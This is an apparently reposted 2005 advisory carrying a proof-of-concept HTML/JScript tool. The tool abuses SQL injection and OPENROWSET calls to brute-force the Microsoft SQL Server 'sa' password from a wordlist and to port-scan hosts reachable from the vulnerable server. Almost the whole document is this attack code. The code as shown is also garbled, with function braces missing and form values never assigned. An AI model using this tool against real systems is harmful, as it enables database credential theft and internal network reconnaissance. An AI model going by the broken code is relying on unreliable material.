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MS SQL Server Passwords Bruteforce via SQL Injection
来源:offtopic@mail.ru 作者:offtopic 发布时间:2005-05-19  

MS SQL Server Passwords Bruteforce via SQL Injection (PoC)

The information has been provided by offtopic.
The original article can be found at: http://www.securitylab.ru/_tools/2005/05/sqlbrut.zip

Base on the article linked in our previous article: Manipulating Microsoft SQL Server Using SQL Injection, the following tool will utilize SQL injection vulnerabilities to brute force MS SQL's sa password.

< html>
< h3>
MS SQL Server passwords bruteforce PoC via SQL Injection
< /h3>
(c)oded by Sergey V. Gordeychik 2005< br>
< a href=mailto: offtopic@mail.ru>offtopic@mail.ru< /a>
< hr>
< table>
< tr>
< td>
URL with injection:
< /td>
< td>
< input type=text Value=";< ***>" id=baseurl>
< /td>
< tr>
< td>
Passwords file:
< /td>
< td>
< input type=text Value="passwords.txt" id=passwords>
< /td>
< /table>
< input type=button Value="Start" onclick="brut();">
< hr>
< h3>
Network port scanner via SQL Injection
< /h3>
< hr>
< table>
< tr>
< td>
< /td>
< td>
< input type=text Value="" id=server>
< tr>
< td>
Port to scan:
< /td>
< td>
< input type=text Value="445" id=port>
< /table>
< input type=button Value="Check" onclick="scan();">
< hr>
< a id="status">< /a>

< script language="JScript">

var xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
var inject = "select * from openrowset('SQLOLEDB','.';'sa';'pass','select 1')"

function scan()

var x,s = inject.replace(".", document.getElementById("server").value + "," + document.getElementById("port").value);
s = document.getElementById("baseurl").value.replace("< ***>", s);
xmlhttp.Open("GET", s, false);
x = xmlhttp.responseText;
if (x.indexOf("SQL Server does not exist")>=1) s="closed"; else
if (x.indexOf("Timeout expired")>=1) s="filtered or unreachable"; else
if (x.indexOf("Login failed")>=1) s="SQL Server detected."; else s="open";
document.getElementById("status").innerHTML="Scaned " + document.getElementById("server").value + ":" + document.getElementById("port").value + ".Port status:< b>"+s;


function checkpass(url, passwd)
var s = inject.replace("pass", passwd);
s = url.replace("< ***>", s);
xmlhttp.Open("GET", s, false);
if (xmlhttp.responseText.indexOf("Login failed")>=1) return 0; else
return 1;

function brut()
var fso, f, pass, baseurl, passwords, i
fso = new ActiveXObject("Scripting.FileSystemObject");
f = fso.OpenTextFile(passwords, 1);
i = 0;
while (!f.AtEndOfStream)
pass = f.ReadLine();
if (!(i % 10))
document.getElementById("status").innerHTML="Trying password N"+i+" < b>"+pass+"< /b>";
if (checkpass(baseurl, pass))
document.getElementById("status").innerHTML="SA password is '< b>"+pass+"< /b>'. Checked "+i+" passwords";
return 0;
document.getElementById("status").innerHTML="Ooopssss.... May be next time";
< /script>

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